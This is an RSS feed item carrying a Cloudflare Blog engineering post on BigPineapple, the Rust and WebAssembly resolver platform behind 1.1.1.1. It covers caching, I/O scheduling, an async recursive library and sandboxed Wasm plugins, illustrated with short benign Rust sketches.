
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Sat, 04 Apr 2026 14:38:13 GMT</lastBuildDate>
        <item>
            <title><![CDATA[How Rust and Wasm power Cloudflare's 1.1.1.1]]></title>
            <link>https://blog.cloudflare.com/big-pineapple-intro/</link>
            <pubDate>Tue, 28 Feb 2023 14:00:00 GMT</pubDate>
            <description><![CDATA[ Introducing a new DNS platform that powers 1.1.1.1 and various other products. ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4tun8W7xGXu4HnA6zxJK7b/07afefd11804c7b7b441a4b102650465/image1-11.png" />
            
            </figure><p>On April 1, 2018, Cloudflare <a href="/dns-resolver-1-1-1-1/">announced</a> the 1.1.1.1 public DNS resolver. Over the years, we added the <a href="https://1.1.1.1/help">debug page</a> for troubleshooting, global <a href="https://1.1.1.1/purge-cache/">cache purge</a>, 0 TTL for zones on Cloudflare, <a href="/encrypting-dns-end-to-end/">Upstream TLS</a>, and <a href="/introducing-1-1-1-1-for-families/">1.1.1.1 for families</a> to the platform. In this post, we would like to share some behind-the-scenes details and changes.</p><p>When the project started, <a href="https://www.knot-resolver.cz/">Knot Resolver</a> was chosen as the DNS resolver. We started building a whole system on top of it, so that it could fit Cloudflare's use case. Having a battle-tested DNS recursive resolver, as well as a DNSSEC validator, was fantastic because we could spend our energy elsewhere, instead of worrying about the DNS protocol implementation.</p><p>Knot Resolver is quite flexible in terms of its Lua-based plugin system. It allowed us to quickly extend the core functionality to support various product features, like DoH/DoT, logging, BPF-based attack mitigation, cache sharing, and iteration logic override. As the <a href="https://mobile.twitter.com/eastdakota/status/1103800276102729729">traffic grew</a>, we started to hit its limitations.</p>
    <div>
      <h2>Lessons we learned</h2>
      <a href="#lessons-we-learned">
        
      </a>
    </div>
    <p>Before going any deeper, let’s first have a bird’s-eye view of a simplified Cloudflare data center setup, which could help us understand what we are going to talk about later. At Cloudflare, every server is identical: the software stack running on one server is exactly the same as on another server, only the configuration may be different. This setup greatly reduces the complexity of fleet maintenance.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/346cYMKrtotPKZx6GcoDMX/e9ab5a9834ace47e28faee2c198dca50/colo_kresd.png" />
            
            </figure><p>Figure 1 Data center layout</p><p>The resolver runs as a daemon process, kresd, and it doesn’t work alone. Requests, specifically DNS requests, are load-balanced to the servers inside a data center by <a href="/unimog-cloudflares-edge-load-balancer/">Unimog</a>. DoH requests are terminated at our TLS terminator. Configs and other small pieces of data can be delivered worldwide by <a href="/introducing-quicksilver-configuration-distribution-at-internet-scale/">Quicksilver</a> in seconds. With all this help, the resolver can concentrate on its own goal: resolving DNS queries, without worrying about transport protocol details. Now let’s talk about three key areas we wanted to improve here: blocking I/O in plugins, a more efficient use of cache space, and plugin isolation.</p>
    <div>
      <h3>Callbacks blocking the event loop</h3>
      <a href="#callbacks-blocking-the-event-loop">
        
      </a>
    </div>
    <p>Knot Resolver has a very flexible plugin system for extending its core functionality. The plugins are called modules, and they are based on callbacks. At certain points during request processing, these callbacks will be invoked with the current query context. This gives a module the ability to inspect, modify, and even produce requests/responses. By design, these callbacks are supposed to be simple, in order to avoid blocking the underlying event loop. This matters because the service is single-threaded, and the event loop is in charge of serving many requests at the same time. So even just one request being held up in a callback means that no other concurrent request can make progress until the callback finishes.</p><p>The setup worked well enough for us until we needed to do blocking operations, for example, to pull data from Quicksilver before responding to the client.</p>
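    <p>To make the hazard concrete, here is a minimal, self-contained sketch (in Rust rather than Lua, with closures standing in for plugin callbacks) of how a single blocking callback stalls every request queued behind it on a single-threaded loop. All names here are illustrative, not Knot Resolver's API:</p>

```rust
use std::thread;
use std::time::{Duration, Instant};

// Run callbacks one at a time on a single thread, like a single-threaded
// event loop, recording when each one finishes relative to the start.
fn run_event_loop(callbacks: Vec<Box<dyn Fn()>>) -> Vec<Duration> {
    let start = Instant::now();
    callbacks.into_iter().map(|cb| { cb(); start.elapsed() }).collect()
}

fn main() {
    let finish_times = run_event_loop(vec![
        Box::new(|| { /* req1: fast cache hit */ }),
        // req2: a blocking lookup, e.g. waiting on a remote datastore
        Box::new(|| thread::sleep(Duration::from_millis(50))),
        Box::new(|| { /* req3: fast, but queued behind req2 */ }),
    ]);
    // req3 finishes at least 50 ms in, despite doing no work itself.
    assert!(finish_times[2] >= Duration::from_millis(50));
    println!("finish times: {:?}", finish_times);
}
```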
    <div>
      <h3>Cache efficiency</h3>
      <a href="#cache-efficiency">
        
      </a>
    </div>
    <p>As requests for a domain could land on any node inside a data center, it would be wasteful to repeatedly resolve a query when another node already has the answer. Intuitively, the latency could be improved if the cache could be shared among the servers, and so we created a cache module which multicasted the newly added cache entries. Nodes inside the same data center could then subscribe to the events and update their local cache.</p><p>The default cache implementation in Knot Resolver is <a href="https://www.symas.com/lmdb">LMDB</a>. It is fast and reliable for small to medium deployments. But in our case, cache eviction soon became a problem. The cache itself doesn’t track TTL, popularity, or any other signal. When it’s full, it just clears all the entries and starts over. Scenarios like zone enumeration could fill the cache with data that is unlikely to be retrieved later.</p><p>Furthermore, our multicast cache module made it worse by amplifying the less useful data to all the nodes, driving them all to the cache high watermark at the same time. Then we saw a latency spike because all the nodes dropped the cache and started over around the same time.</p>
    <div>
      <h3>Module isolation</h3>
      <a href="#module-isolation">
        
      </a>
    </div>
    <p>As the list of Lua modules grew, debugging issues became increasingly difficult. This is because a single Lua state is shared among all the modules, so one misbehaving module could affect another. For example, when something went wrong inside the Lua state, like having too many coroutines, or being out of memory, we got lucky if the program just crashed, but the resulting stack traces were hard to read. It is also difficult to forcibly tear down or upgrade a running module, as it holds state not only in the Lua runtime but also across the FFI boundary, so memory safety is not guaranteed.</p>
    <div>
      <h2>Hello BigPineapple</h2>
      <a href="#hello-bigpineapple">
        
      </a>
    </div>
    <p>We didn’t find any existing software that would meet our somewhat niche requirements, so eventually we started building something ourselves. The first attempt was to <a href="https://github.com/vavrusa/rust-kres">wrap Knot Resolver's core</a> with a thin service written in Rust (modified <a href="https://github.com/jedisct1/edgedns">edgedns</a>).</p><p>This proved to be difficult due to having to constantly convert between the storage and C/FFI types, and some other quirks (for example, the ABI for looking up records from cache expects the returned records to be immutable until the next call, or the end of the read transaction). But we learned a lot from trying to implement this sort of split functionality where the host (the service) provides some resources to the guest (resolver core library), and how we would make that interface better.</p><p>In later iterations, we replaced the entire recursive library with a new one based around an async runtime, and added a redesigned module system to it, sneakily rewriting the service into Rust over time as we swapped out more and more components. That async runtime was <a href="https://tokio.rs/">tokio</a>, which offered a neat thread pool interface for running both non-blocking and blocking tasks, as well as a good ecosystem for working with other crates (Rust libraries).</p><p>After that, as the futures combinators became tedious, we started converting everything to async/await. This was before async/await landed in Rust 1.39, which led us to use the nightly toolchain for a while and brought <a href="https://areweasyncyet.rs/">some hiccups</a>. When async/await stabilized, it enabled us to write our request processing routine ergonomically, similar to Go.</p><p>All the tasks can be run concurrently, and certain I/O-heavy ones can be broken down into smaller pieces, to benefit from more granular scheduling. 
As the runtime executes tasks on a thread pool instead of a single thread, it also benefits from work stealing. This avoids the problem we had before, where a single request that took a long time to process blocked all the other requests on the event loop.</p>
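<p>The difference can be sketched with plain OS threads standing in for tokio's work-stealing pool (a rough illustration, not BigPineapple's actual scheduler): with more than one worker pulling from a shared queue, a slow task ties up only one worker while the rest of the queue keeps draining.</p>

```rust
use std::sync::mpsc;
use std::sync::{Arc, Mutex};
use std::thread;
use std::time::Duration;

// Run named tasks on a small pool of workers sharing one queue. A slow task
// occupies only one worker; the others keep draining the queue.
fn run_on_pool(tasks: Vec<(&'static str, Duration)>, workers: usize) -> Vec<&'static str> {
    let (task_tx, task_rx) = mpsc::channel::<(&'static str, Duration)>();
    let task_rx = Arc::new(Mutex::new(task_rx));
    let (done_tx, done_rx) = mpsc::channel();

    let n = tasks.len();
    for t in tasks {
        task_tx.send(t).unwrap();
    }
    drop(task_tx); // close the queue so idle workers exit when it drains

    let handles: Vec<_> = (0..workers)
        .map(|_| {
            let rx = Arc::clone(&task_rx);
            let done = done_tx.clone();
            thread::spawn(move || loop {
                // Hold the lock only long enough to pop one task.
                let task = rx.lock().unwrap().recv();
                match task {
                    Ok((name, cost)) => {
                        thread::sleep(cost); // simulated work
                        done.send(name).unwrap();
                    }
                    Err(_) => break, // queue closed and drained
                }
            })
        })
        .collect();
    drop(done_tx);

    let finished: Vec<_> = done_rx.iter().take(n).collect();
    for h in handles {
        h.join().unwrap();
    }
    finished // completion order, not submission order
}

fn main() {
    let order = run_on_pool(
        vec![
            ("slow", Duration::from_millis(100)),
            ("fast1", Duration::from_millis(0)),
            ("fast2", Duration::from_millis(0)),
        ],
        2,
    );
    // Both fast tasks complete while "slow" still occupies its worker.
    assert_eq!(order.last(), Some(&"slow"));
    println!("completion order: {:?}", order);
}
```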
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/72roTqirnpOZTjQpp36q4t/ec16e695ef22b93f475df0eed9e21f9e/blog_server.png" />
            
            </figure><p>Figure 2 Components overview</p><p>Finally, we forged a platform that we are happy with, and we call it <b>BigPineapple</b>. The figure above shows an overview of its main components and the data flow between them. Inside BigPineapple, the server module gets inbound requests from the client, validates and transforms them into unified frame streams, which can then be processed by the worker module. The worker module has a set of workers, whose task is to figure out the answer to the question in the request. Each worker interacts with the cache module to check if the answer is there and still valid; otherwise, it drives the recursor module to recursively iterate the query. The recursor doesn’t do any I/O; when it needs anything, it delegates the sub-task to the conductor module. The conductor then uses outbound queries to get the information from upstream nameservers. Throughout the whole process, some modules can interact with the Sandbox module, to extend BigPineapple’s functionality by running plugins inside it.</p><p>Let’s look at some of them in more detail, and see how they helped us overcome the problems we had before.</p>
    <div>
      <h3>Updated I/O architecture</h3>
      <a href="#updated-i-o-architecture">
        
      </a>
    </div>
    <p>A DNS resolver can be seen as an agent between a client and several authoritative nameservers: it receives requests from the client, recursively fetches data from the upstream nameservers, then composes the responses and sends them back to the client. So it has both inbound and outbound traffic, which are handled by the server and the conductor components, respectively.</p><p>The server listens on a list of interfaces using different transport protocols. These are later abstracted into streams of “frames”. Each frame is a high-level representation of a DNS message, with some extra metadata. Underneath, it can be a UDP packet, a segment of a TCP stream, or the payload of an HTTP request, but they are all processed the same way. The frame is then converted into an asynchronous task, which in turn is picked up by a set of workers in charge of resolving these tasks. The finished tasks are converted back into responses, and sent back to the client.</p><p>This “frame” abstraction over the protocols and their encodings simplified the logic used to regulate the frame sources, such as enforcing fairness to prevent starvation and controlling pacing to protect the server from being overwhelmed. One of the things we’ve learned with the previous implementations is that, for a service open to the public, peak I/O performance matters less than the ability to pace clients fairly. This is mainly because the time and computational cost of each recursive request is vastly different (compare a cache hit with a cache miss), and it’s difficult to predict beforehand. Cache misses in a recursive service not only consume Cloudflare’s resources, but also the resources of the authoritative nameservers being queried, so we need to be mindful of that.</p><p>On the other side of the server is the conductor, which manages all the outbound connections. 
It helps to answer some questions before reaching out to the upstream: Which is the fastest nameserver to connect to in terms of latency? What should be done if none of the nameservers are reachable? What protocol to use for the connection, and are there any <a href="https://engineering.fb.com/2018/12/21/security/dns-over-tls/">better options</a>? The conductor is able to make these decisions by tracking the upstream server’s metrics, such as <a href="https://www.cloudflare.com/learning/cdn/glossary/round-trip-time-rtt/">RTT</a>, QoS, etc. With that knowledge, it can also estimate things like upstream capacity and UDP packet loss, and take the necessary actions, e.g. retry when it thinks the previous UDP packet didn’t reach the upstream.</p>
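<p>As a toy illustration of the “fastest nameserver” decision, a conductor-style selection could look like the sketch below. The <code>Upstream</code> struct and its fields are assumptions made for the example; the real metrics tracking is more involved:</p>

```rust
use std::net::{IpAddr, Ipv4Addr};
use std::time::Duration;

// Hypothetical per-upstream metrics a conductor could track.
struct Upstream {
    addr: IpAddr,
    srtt: Duration, // smoothed round-trip time from past exchanges
    reachable: bool,
}

// Pick the reachable nameserver with the lowest smoothed RTT, if any.
fn pick_upstream(upstreams: &[Upstream]) -> Option<&Upstream> {
    upstreams.iter().filter(|u| u.reachable).min_by_key(|u| u.srtt)
}

fn main() {
    let upstreams = vec![
        Upstream { addr: IpAddr::V4(Ipv4Addr::new(192, 0, 2, 1)), srtt: Duration::from_millis(40), reachable: true },
        Upstream { addr: IpAddr::V4(Ipv4Addr::new(192, 0, 2, 2)), srtt: Duration::from_millis(12), reachable: true },
        // Fastest on paper, but currently unreachable: must be skipped.
        Upstream { addr: IpAddr::V4(Ipv4Addr::new(192, 0, 2, 3)), srtt: Duration::from_millis(5), reachable: false },
    ];
    let best = pick_upstream(&upstreams).expect("no reachable upstream");
    assert_eq!(best.addr, IpAddr::V4(Ipv4Addr::new(192, 0, 2, 2)));
    println!("fastest reachable upstream: {}", best.addr);
}
```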
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3oLCVKn5GkZd5SmRnuYSmL/fd8c90e52308efd01698c40d09c724d6/conductor-1-.png" />
            
            </figure><p>Figure 3 I/O conductor</p><p>Figure 3 shows the simplified data flow through the conductor. It is called by the exchanger mentioned above, with upstream requests as input. The requests are deduplicated first: within a small window, if many requests arrive for the same question, only one of them will pass; the others are put into a waiting queue. This is common when a cache entry expires, and can reduce unnecessary network traffic. Then based on the request and upstream metrics, the connection instructor either picks an open connection if available, or generates a set of parameters. With these parameters, the I/O executor is able to connect to the upstream directly, or even take a route via another Cloudflare data center using our <a href="/argo/">Argo Smart Routing technology</a>!</p>
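<p>The deduplication step can be sketched as a small single-flight table: the first caller for a question becomes the leader, and later callers wait on a channel for the leader's answer. All names here (<code>Deduper</code>, <code>admit</code>, <code>complete</code>) are hypothetical, not BigPineapple's API:</p>

```rust
use std::collections::HashMap;
use std::sync::mpsc::{channel, Receiver, Sender};

// Outcome of asking the deduplicator about a query: either this caller is
// the leader (it must actually contact the upstream) or it waits for the
// leader's answer.
enum Admission {
    Leader,
    Waiter(Receiver<String>),
}

#[derive(Default)]
struct Deduper {
    in_flight: HashMap<String, Vec<Sender<String>>>,
}

impl Deduper {
    // First caller for a query becomes the leader; later callers get a
    // channel on which the leader's answer is fanned out.
    fn admit(&mut self, query: &str) -> Admission {
        if let Some(waiters) = self.in_flight.get_mut(query) {
            let (tx, rx) = channel();
            waiters.push(tx);
            Admission::Waiter(rx)
        } else {
            self.in_flight.insert(query.to_string(), Vec::new());
            Admission::Leader
        }
    }

    // The leader got an answer: deliver it to everyone who queued up.
    fn complete(&mut self, query: &str, answer: &str) {
        for tx in self.in_flight.remove(query).unwrap_or_default() {
            let _ = tx.send(answer.to_string());
        }
    }
}

fn main() {
    let mut dedup = Deduper::default();
    assert!(matches!(dedup.admit("example.com. A"), Admission::Leader));
    let rx = match dedup.admit("example.com. A") {
        Admission::Waiter(rx) => rx,
        Admission::Leader => unreachable!("second caller must wait"),
    };
    dedup.complete("example.com. A", "192.0.2.53");
    assert_eq!(rx.recv().unwrap(), "192.0.2.53");
    println!("waiter got the leader's answer");
}
```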
    <div>
      <h3>The cache</h3>
      <a href="#the-cache">
        
      </a>
    </div>
    <p>Caching in a recursive service is critical as a server can return a cached response in under one millisecond, while a cache miss takes hundreds of milliseconds to answer. As memory is a finite resource (and also a shared resource in Cloudflare’s architecture), more efficient use of cache space was one of the key areas we wanted to improve. The new cache is implemented with a cache replacement data structure (<a href="https://en.wikipedia.org/wiki/Adaptive_replacement_cache">ARC</a>), instead of a KV store. This makes good use of the space on a single node, as less popular entries are progressively evicted, and the data structure is resistant to scans.</p><p>Moreover, instead of duplicating the cache across the whole data center with multicast, as we did before, BigPineapple is aware of its peer nodes in the same data center, and relays queries from one node to another if it cannot find an entry in its own cache. This is done by applying consistent hashing to map queries onto the healthy nodes in each data center. So, for example, queries for the same registered domain go through the same subset of nodes, which not only increases the cache hit ratio, but also helps the infrastructure cache, which stores information about performance and features of nameservers.</p>
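<p>As an illustration of hashing queries onto healthy nodes, here is a sketch using rendezvous (highest-random-weight) hashing, one common consistent-hashing scheme; the post doesn't specify BigPineapple's exact algorithm, so treat this as a stand-in:</p>

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

// Rendezvous hashing: every node gets a score for the key, and the highest
// score wins. Removing a node only remaps the keys that node owned, which
// is the property we want for a shared in-data-center cache.
fn owner<'a>(key: &str, nodes: &'a [&'a str]) -> Option<&'a str> {
    nodes.iter().copied().max_by_key(|node| {
        let mut h = DefaultHasher::new();
        (key, *node).hash(&mut h);
        h.finish()
    })
}

fn main() {
    let nodes = ["node-a", "node-b", "node-c"];
    let n1 = owner("example.com", &nodes).unwrap();
    // The same registered domain always lands on the same node.
    assert_eq!(owner("example.com", &nodes), Some(n1));
    println!("example.com is served by {}", n1);
}
```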
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Ddu8jHnfdToCysh4urr1V/d7634e09dfb853c862f75af3b7c33cca/colo_3_bp.png" />
            
            </figure><p>Figure 4 Updated data center layout</p>
    <div>
      <h3>Async recursive library</h3>
      <a href="#async-recursive-library">
        
      </a>
    </div>
    <p>The recursive library is the DNS brain of BigPineapple, as it knows how to find the answer to the question in the query. Starting from the root, it breaks down the client query into subqueries, and uses them to collect knowledge recursively from various authoritative nameservers on the Internet. The product of this process is the answer. Thanks to async/await, it can be abstracted as a function like this:</p>
            <pre><code>async fn resolve(Request, Exchanger) -&gt; Result&lt;Response&gt;;</code></pre>
            <p>The function contains all the logic necessary to generate a response to a given request, but it doesn’t do any I/O on its own. Instead, we pass an Exchanger trait (Rust interface) that knows how to exchange DNS messages with upstream authoritative nameservers asynchronously. The exchanger is usually called at various await points - for example, when a recursion starts, one of the first things it does is that it looks up the closest cached delegation for the domain. If it doesn’t have the final delegation in cache, it needs to ask what nameservers are responsible for this domain and wait for the response, before it can proceed any further.</p><p>Thanks to this design, which decouples the “waiting for some responses” part from the recursive DNS logic, it is much easier to test by providing a mock implementation of the exchanger. In addition, it makes the recursive iteration code (and DNSSEC validation logic in particular) much more readable, as it’s written sequentially instead of being scattered across many callbacks.</p><p>Fun fact: writing a DNS recursive resolver from scratch is not fun at all!</p><p>Not only because of the complexity of DNSSEC validation, but also because of the necessary “workarounds” needed for various RFC incompatible servers, forwarders, firewalls, etc. So we ported <a href="https://github.com/CZ-NIC/deckard">deckard</a> into Rust to help test it. Additionally, when we started migrating over to this new async recursive library, we first ran it in “shadow” mode: processing real world query samples from the production service, and comparing differences. We’ve done this in the past on Cloudflare’s authoritative DNS service as well. 
It is slightly more difficult for a recursive service because it has to look up all the data over the Internet, and authoritative nameservers often give different answers for the same query due to localization, load balancing, and such, leading to many false positives.</p><p>In December 2019, we finally enabled the new service on a public test endpoint (see the <a href="https://community.cloudflare.com/t/help-us-test-a-new-version-of-1-1-1-1-public-dns-resolver/137078">announcement</a>) to iron out remaining issues before slowly migrating the production endpoints to the new service. Even after all that, we continued to find edge cases with the DNS recursion (and DNSSEC validation in particular), but fixing and reproducing these issues has become much easier due to the new architecture of the library.</p>
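<p>The Exchanger decoupling described above can be sketched as follows. This is a synchronous simplification with invented types (the real trait is async and exchanges DNS messages, not strings), but it shows why a mock makes the recursion logic testable without touching the network:</p>

```rust
use std::collections::HashMap;

// A synchronous stand-in for the Exchanger trait; illustrative only.
trait Exchanger {
    fn exchange(&self, query: &str) -> Result<String, String>;
}

// Mock exchanger for tests: canned answers instead of real network I/O.
struct MockExchanger {
    answers: HashMap<&'static str, &'static str>,
}

impl Exchanger for MockExchanger {
    fn exchange(&self, query: &str) -> Result<String, String> {
        self.answers
            .get(query)
            .map(|a| a.to_string())
            .ok_or_else(|| format!("SERVFAIL: no mock answer for {query}"))
    }
}

// A trivially simplified "resolver": all DNS logic here, no I/O of its own.
fn resolve(query: &str, exchanger: &dyn Exchanger) -> Result<String, String> {
    exchanger.exchange(query)
}

fn main() {
    let mock = MockExchanger {
        answers: HashMap::from([("example.com. A", "192.0.2.1")]),
    };
    assert_eq!(resolve("example.com. A", &mock), Ok("192.0.2.1".to_string()));
    assert!(resolve("nxdomain.test. A", &mock).is_err());
    println!("resolver tested without touching the network");
}
```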
    <div>
      <h3>Sandboxed plugins</h3>
      <a href="#sandboxed-plugins">
        
      </a>
    </div>
    <p>Having the ability to extend the core DNS functionality on the fly is important for us, so BigPineapple has a redesigned plugin system. Before, the Lua plugins ran in the same memory space as the service itself, and were generally free to do what they wanted. This was convenient, as we could freely pass memory references between the service and modules using C/FFI. For example, to read a response directly from cache without having to copy to a buffer first. But it was also dangerous, as the module could read uninitialized memory, call a host ABI using a wrong function signature, block on a local socket, or do other undesirable things, and the service had no way to restrict these behaviors.</p><p>So we looked at replacing the embedded Lua runtime with JavaScript, or native modules, but around the same time, embedded runtimes for WebAssembly (Wasm for short) started to appear. Two nice properties of WebAssembly programs are that they can be written in the same language as the rest of the service, and that they run in an isolated memory space. So we started modeling the guest/host interface around the limitations of WebAssembly modules, to see how that would work.</p><p>BigPineapple’s Wasm runtime is currently powered by <a href="https://wasmer.io/">Wasmer</a>. We tried several runtimes, like <a href="https://wasmtime.dev/">Wasmtime</a> and <a href="https://wavm.github.io/">WAVM</a> in the beginning, and found Wasmer simpler to use in our case. The runtime allows each module to run in its own instance, with an isolated memory and a signal trap, which naturally solved the module isolation problem we described before. In addition to this, we can have multiple instances of the same module running at the same time. With careful control, apps can be hot-swapped from one instance to another without missing a single request! This is great because the apps can be upgraded on the fly without a server restart. 
Given that the Wasm programs are distributed via Quicksilver, BigPineapple’s functionality can be safely changed worldwide within a few seconds!</p><p>To better understand the WebAssembly sandbox, several terms need to be introduced first:</p><ul><li><p>Host: the program which runs the Wasm runtime. Similar to a kernel, it has full control through the runtime over the guest applications.</p></li><li><p>Guest application: the Wasm program inside the sandbox. Within a restricted environment, it can only access its own memory space, which is provided by the runtime, and call the imported host calls. We call it an app for short.</p></li><li><p>Host call: the functions defined in the host that can be imported by the guest. Comparable to a syscall, it’s the only way guest apps can access resources outside the sandbox.</p></li><li><p>Guest runtime: a library for guest applications to easily interact with the host. It implements some common interfaces, so an app can just use async, sockets, logging and tracing without knowing the underlying details.</p></li></ul><p>Now it’s time to dive into the sandbox, so stay awhile and listen. First let’s start from the guest side, and see what a common app lifespan looks like. With the help of the guest runtime, guest apps can be written much like regular programs. So, like other executables, an app begins with a start function as an entrypoint, which is called by the host upon loading. It is also provided with arguments, as if from the command line. At this point, the instance normally does some initialization and, more importantly, registers callback functions for different query phases. This is because in a recursive resolver, a query has to go through several phases before it gathers enough information to produce a response, for example a cache lookup, or making subrequests to resolve a delegation chain for the domain, so being able to tie into these phases is necessary for the apps to be useful for different use cases. 
The start function can also run some background tasks to supplement the phase callbacks, and store global state. For example - report metrics, or pre-fetch shared data from external sources, etc. Again, just like how we write a normal program.</p><p>But where do the program arguments come from? How could a guest app send log and metrics? The answer is, external functions.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2rMKxgaKCweGenTEf3kQ9U/07adc8e464df9662c2633fe5f36dd315/sandbox-1-.png" />
            
            </figure><p>Figure 5 Wasm-based sandbox</p><p>In figure 5, we can see a barrier in the middle, which is the sandbox boundary that separates the guest from the host. The only way one side can reach out to the other is via a set of functions exported by the peer beforehand. As in the picture, the “hostcalls” are exported by the host, imported and called by the guest; while the “trampolines” are guest functions that the host has knowledge of.</p><p>It is called a <a href="https://en.wikipedia.org/wiki/Trampoline_(computing)">trampoline</a> because it is used to invoke a function or a closure inside a guest instance that’s not exported. The phase callbacks are one example of why we need a trampoline function: each callback returns a closure, and therefore can’t be exported on instantiation. So when a guest app wants to register a callback, it calls a host call with the callback address: “<code>hostcall_register_callback(pre_cache, #30987)</code>”. When the callback needs to be invoked, the host cannot just call that pointer, as it points into the guest’s memory space. What it can do instead is leverage one of the aforementioned trampolines, and give it the address of the callback closure: “<code>trampoline_call(#30987)</code>”.</p>
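<p>The registration-and-trampoline dance can be simulated outside Wasm with a table of closures standing in for guest memory addresses. The function names follow the examples above, but the mechanics here are purely illustrative:</p>

```rust
use std::collections::HashMap;

// The "guest" here is a table of closures indexed by address, standing in
// for closures living inside Wasm linear memory.
type GuestAddr = u32;

struct Sandbox {
    // Host side: which guest addresses to invoke at each query phase.
    callbacks: HashMap<&'static str, Vec<GuestAddr>>,
    // Guest side: closures reachable only through the trampoline.
    guest_table: HashMap<GuestAddr, Box<dyn Fn(&mut Vec<String>)>>,
}

impl Sandbox {
    // hostcall: the guest registers "call address N at phase P".
    fn hostcall_register_callback(&mut self, phase: &'static str, addr: GuestAddr) {
        self.callbacks.entry(phase).or_default().push(addr);
    }

    // trampoline: the only way the host can reach an unexported guest closure.
    fn trampoline_call(&self, addr: GuestAddr, log: &mut Vec<String>) {
        (self.guest_table[&addr])(log);
    }

    // The host drives a query phase by bouncing through the trampoline.
    fn run_phase(&self, phase: &str, log: &mut Vec<String>) {
        for addr in self.callbacks.get(phase).into_iter().flatten() {
            self.trampoline_call(*addr, log);
        }
    }
}

fn main() {
    let mut sandbox = Sandbox { callbacks: HashMap::new(), guest_table: HashMap::new() };
    sandbox.guest_table.insert(30987, Box::new(|log| log.push("pre_cache app ran".into())));
    sandbox.hostcall_register_callback("pre_cache", 30987);

    let mut log = Vec::new();
    sandbox.run_phase("pre_cache", &mut log);
    assert_eq!(log, vec!["pre_cache app ran".to_string()]);
    println!("phase log: {:?}", log);
}
```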
    <div>
      <h4>Isolation overhead</h4>
      <a href="#isolation-overhead">
        
      </a>
    </div>
    <p>Like a coin, the new sandbox has two sides: the portability and isolation that WebAssembly offers come at an extra cost. Here, we'll list two examples.</p><p>Firstly, guest apps are not allowed to read host memory. The way it works is the guest provides a memory region via a host call, then the host writes the data into the guest memory space. This introduces a memory copy that would not be needed if we were outside the sandbox. The bad news is, in our use case, the guest apps are supposed to do something on the query and/or the response, so they almost always need to read data from the host on every single request. The good news, on the other hand, is that during a request life cycle, the data won’t change. So we pre-allocate a block of memory in the guest memory space right after the guest app instantiates. The allocated memory is not going to be used, but instead serves to occupy a hole in the address space. Once the host gets the address details, it maps a shared memory region with the common data needed by the guest into the guest’s space. When the guest code starts to execute, it can just access the data in the shared memory overlay, and no copy is needed.</p><p>Another issue we ran into was when we wanted to add support for a modern protocol, <a href="/oblivious-dns/">oDoH</a>, into BigPineapple. Its main job is to decrypt the client query, resolve it, then encrypt the answer before sending it back. By design, this doesn’t belong in core DNS, and should instead be handled by a Wasm app. However, the WebAssembly instruction set doesn’t provide some crypto primitives, such as AES and SHA-2, which prevents it from benefiting from the host hardware. There is ongoing work to bring this functionality to Wasm with <a href="https://github.com/WebAssembly/wasi-crypto">WASI-crypto</a>. 
Until then, our solution is simply to delegate the <a href="/hybrid-public-key-encryption/">HPKE</a> operations to the host via host calls, and we have already seen a 4x performance improvement compared to doing them inside Wasm.</p>
    <div>
      <h4>Async in Wasm</h4>
      <a href="#async-in-wasm">
        
      </a>
    </div>
    <p>Remember the problem we talked about before, where callbacks could block the event loop? Essentially, the problem is how to run the sandboxed code asynchronously. Because no matter how complex the request processing callback is, if it can yield, we can put an upper bound on how long it is allowed to block. Luckily, Rust’s async framework is both elegant and lightweight. It gives us the opportunity to implement the “Future”s with a set of guest calls.</p><p>In Rust, a Future is a building block for asynchronous computations. From the user’s perspective, in order to make an asynchronous program, one has to take care of two things: implement a pollable function that drives the state transition, and place a waker as a callback to wake itself up when the pollable function should be called again due to some external event (e.g. time passes, a socket becomes readable, and so on). The former is to be able to progress the program gradually, e.g. read buffered data from I/O and return a new state indicating the status of the task: either finished or yielded. The latter is useful in case of task yielding, as it will trigger the Future to be polled when the conditions that the task was waiting for are fulfilled, instead of busy looping until it’s complete.</p><p>Let’s see how this is implemented in our sandbox. When the guest needs to do some I/O, it has to do so via the host calls, as it is inside a restricted environment. Assuming the host provides a set of simplified host calls which mirror the basic socket operations: open, read, write, and close, the guest can have its pseudo poller defined as below:</p>
            <pre><code>fn poll(&amp;mut self, wake: fn()) -&gt; Poll {
    match hostcall_socket_read(self.sock, self.buffer) {
        HostOk  =&gt; Poll::Ready,
        HostEof =&gt; Poll::Pending,
    }
}</code></pre>
            <p>Here the host call reads data from a socket into a buffer; depending on its return value, the function can move itself to one of the states we mentioned above: finished (Ready) or yielded (Pending). The magic happens inside the host call. Remember in figure 5, that it is the only way to access resources? The guest app doesn’t own the socket, but it can acquire a “handle” via “<code>hostcall_socket_open</code>”, which will in turn create a socket on the host side, and return a handle. The handle can be anything in theory, but in practice integer socket handles map well to file descriptors on the host side, or to indices in a vector or slab. By referencing the returned handle, the guest app is able to remotely control the real socket. As the host side is fully asynchronous, it can simply relay the socket state to the guest. If you noticed that the waker function isn’t used above, well done! That’s because when the host call is called, it not only starts opening a socket, but also registers the current waker to be called when the socket is opened (or fails to open). So when the socket becomes ready, the host task will be woken up; it will find the corresponding guest task from its context, and wake it up using the trampoline function, as shown in figure 5. There are other cases where a guest task needs to wait for another guest task, an async mutex for example. The mechanism here is similar: using host calls to register wakers.</p><p>All of these complicated things are encapsulated in our guest async runtime, with an easy-to-use API, so the guest apps get access to regular async functions without having to worry about the underlying details.</p>
